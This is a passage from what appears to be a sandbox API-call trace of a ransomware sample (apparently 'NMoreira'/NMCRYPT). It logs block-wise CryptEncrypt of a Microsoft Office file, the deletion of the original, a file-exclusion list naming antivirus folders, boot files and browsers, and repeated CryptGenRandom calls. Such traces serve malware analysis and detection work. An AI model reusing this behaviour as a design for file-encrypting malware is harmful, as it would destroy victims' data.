lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.549] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.549] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.549] GetLastError () returned 0x0 [0170.549] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.549] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.549] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.549] GetLastError () returned 0x0 [0170.549] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.549] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.549] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.549] GetLastError () returned 0x0 [0170.549] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.549] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.550] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.550] GetLastError () returned 0x0 [0170.550] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.550] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.550] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.550] GetLastError () returned 0x0 [0170.550] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.550] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.550] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.550] GetLastError () returned 0x0 [0170.550] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.550] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.550] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.550] GetLastError () returned 0x0 [0170.550] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.550] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.550] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.550] GetLastError () returned 0x0 [0170.550] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.550] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.551] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.551] GetLastError () returned 0x0 [0170.551] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.551] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.551] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.551] GetLastError () returned 0x0 [0170.551] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0171.038] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\AppXManifest.xml") returned 1 [0171.038] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\AppXManifest.xml" (normalized: "c:\\program files\\microsoft office\\appxmanifest.xml")) returned 1 [0171.039] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0171.039] wcslen (_String="OK") returned 0x2 [0171.039] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0171.039] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0171.039] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0171.039] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0171.039] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0171.039] PathMatchSpecW (pszFile="bread matt.exe", pszSpec="*NMCRYPT") returned 0 [0171.039] PathMatchSpecW (pszFile="bread matt.exe", pszSpec="*Recovers your files.html") returned 0 [0171.039] PathMatchSpecW (pszFile="bread matt.exe", pszSpec="*.exe") returned 1 [0171.039] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*NMCRYPT") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*Recovers your files.html") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*.exe") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*.dll") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*.lnk") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*.bat") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*.ini") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*.msi") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*.scf") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*pagefile.sys*") returned 0 [0171.039] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*NTUSER.DAT*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*AppData*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\winrar\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\java\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\windows\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\ESET\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\AVG\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\AVIRA\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*Atheros*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*Realtek*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*bootmgr*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*boot*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*boot*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*CONFIG.SYS*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*IO.SYS*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*MSDOS.SYS*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*NTDETECT.COM*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*ntldr*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*chrome*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*opera*") returned 0 [0171.040] PathMatchSpecW (pszFile="FileSystemMetadata.xml", pszSpec="*firefox*") returned 0 [0171.040] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\FileSystemMetadata.xml", pszSpec="*") returned 1 [0171.040] strlen (_Str="NMoreira") returned 0x8 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.040] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.041] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.042] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eff0 | out: pbBuffer=0x2d7eff0) returned 1 [0171.043] CryptGenRandom (in: 